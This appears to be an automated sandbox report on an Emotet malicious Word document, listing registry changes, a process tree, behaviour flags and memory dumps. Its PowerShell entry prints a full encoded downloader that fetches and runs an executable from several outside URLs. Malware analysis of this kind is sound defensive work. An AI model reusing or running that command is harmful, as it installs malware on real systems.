Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5BB0FAC6-657A-4E8A-9348-2ED15190A268}\1.0\0\win32\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms\\INKEDLib.exd"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"

Emotet
Emotet is a trojan that is primarily spread through spam emails
trojan banker emotet

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8a1b1714e1ae0fabcf590df96af964ab.27.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Drops file in System32 directory
PID:1040

C:\Windows\SYSTEM32\WISPTIS.EXE
/QuitInfo:000000000000061C;0000000000000668;
1⤵
- Suspicious use of SetWindowsHookEx
PID:2000

C:\Windows\SYSTEM32\WISPTIS.EXE
/QuitInfo:000000000000061C;0000000000000668;
1⤵
- Suspicious use of SetWindowsHookEx
PID:1940

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABHAHYAYQB1AG4AcQBiAHgAYgBwAHkAYQB5AD0AJwBUAGcAbQBqAHcAbQBwAGgAdAByAHYAJwA7ACQASABlAHQAZQB6AG4AZQBjAHcAbwBrAGMAIAA9ACAAJwA2ADYAMgAnADsAJABPAGYAbAB4AGIAdAByAG4AcgBmAGcAcwA9ACcARABmAHkAcABiAG8AZABpACcAOwAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGUAdABlAHoAbgBlAGMAdwBvAGsAYwArACcALgBlAHgAZQAnADsAJABRAGoAcQBuAGgAZAByAHoAbgBmAG0AawA9ACcAWABpAHcAZgBvAGcAZABkACcAOwAkAEcAYwBmAGkAcQBqAGMAcABhAHcAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAOwAkAFcAbAByAG0AZgBmAG0AawB2AGMAPQAnAGgAdAB0AHAAcwA6AC8ALwBmAGEAbgBpAHQAdgAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvAG8AUQBtAEwAWgBEAC8AKgBoAHQAdABwADoALwAvAGIAaQBjAGgAZQByAHUALQBjAHkAYwBsAGkAbgBnAC4AcgBvAC8AYgBiAHIALwBJAEUAUwBjAG0AegBoAC8AKgBoAHQAdABwADoALwAvAGwAZQBzAGQAZQBiAGEAdABzAGQAZQBjAG8AdQB6AG8AbgAuAG8AcgBnAC8AbABkAGQAYwAvADcAdwBwAGUAMgAtAGsAYwBrAGIAegA0AHoAYQAtADIANQA1ADYAOAAvACoAaAB0AHQAcABzADoALwAvADQAdgBlAHQAYwBiAGQALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBDAHEAQwBqAFEAeABZAHEAeAAvACoAaAB0AHQAcAA6AC8ALwB6AGwAYQB0AGUAYgBlAG4AegAuAG0AawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AG4AbABrAHoANgB5AC0AbABtAGYAawAtADkAMQAzADYAMgA5ADYANwAyADEALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQARQBuAHMAZwBwAHoAbwBnAGgAdABoAD0AJwBEAGcAbwBvAGgAZgBlAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAZgBnAHEAdAB1AGIAeABxACAAaQBuACAAJABXAGwAcgBtAGYAZgBtAGsAdgBjACkAewB0AHIAeQB7ACQARwBjAGYAaQBxAGoAYwBwAGEAdwAuACIAZABPAHcAbgBsAG8AYQBgAGQAZgBgAGkAbABFACIAKAAkAFQAZgBnAHEAdAB1AGIAeABxACwAIAAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0ACkAOwAkAFcAcgB0AHMAeAB0AHEAcABtAGcAZABqAD0AJwBMAGoAbwByAGcAYwB0AHYAZgBmACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQAuACIATABFAE4AYABHAFQASAAiACAALQBnAGUAIAAzADQAMwA1ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAFQAIgAoACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQA7ACQAUwB2AHgAeQB4AGsAdQB3AD0AJwBHAHEAbgBxAGUAdQBsAHoAdQBsAGQAYwB4ACcAOwBiAHIAZQBhAGsAOwAkAEoAcQB6AGIAbQBvAHoAeQB0AHkAdAA9ACcARwB5AHoAbwB3AG4AaABhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB0AGYAeABuAHcAcQB4AGcAbABvAD0AJwBWAGIAaABoAHMAdABzAGsAZgBkAHQAdwAnAA==
1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:732
- C:\Users\Admin\662.exe
  "C:\Users\Admin\662.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE
  PID:2160
- - C:\Users\Admin\662.exe
    --2a4aec10
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Suspicious behavior: EmotetMutantsSpam
    - Drops file in System32 directory
    - Executes dropped EXE
    PID:2188

C:\Windows\SysWOW64\makercors.exe
"C:\Windows\SysWOW64\makercors.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:2248
- C:\Windows\SysWOW64\makercors.exe
  --e378e007
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: EmotetMutantsSpam
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Executes dropped EXE
  PID:2268

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1040-3-0x00000000099F0000-0x00000000099F4000-memory.dmp

Filesize
16KB

Download
memory/1040-2-0x00000000061CB000-0x00000000061CF000-memory.dmp

Filesize
16KB

Download
memory/1040-1-0x00000000061CB000-0x00000000061CF000-memory.dmp

Filesize
16KB

Download
memory/1040-0-0x0000000005FC0000-0x0000000005FC4000-memory.dmp

Filesize
16KB

Download
memory/2160-9-0x0000000000480000-0x0000000000497000-memory.dmp

Filesize
92KB

Download
memory/2188-13-0x0000000000260000-0x0000000000277000-memory.dmp

Filesize
92KB

Download
memory/2188-14-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2248-16-0x0000000000510000-0x0000000000527000-memory.dmp

Filesize
92KB

Download
memory/2268-18-0x0000000000300000-0x0000000000317000-memory.dmp

Filesize
92KB

Download
memory/2268-19-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download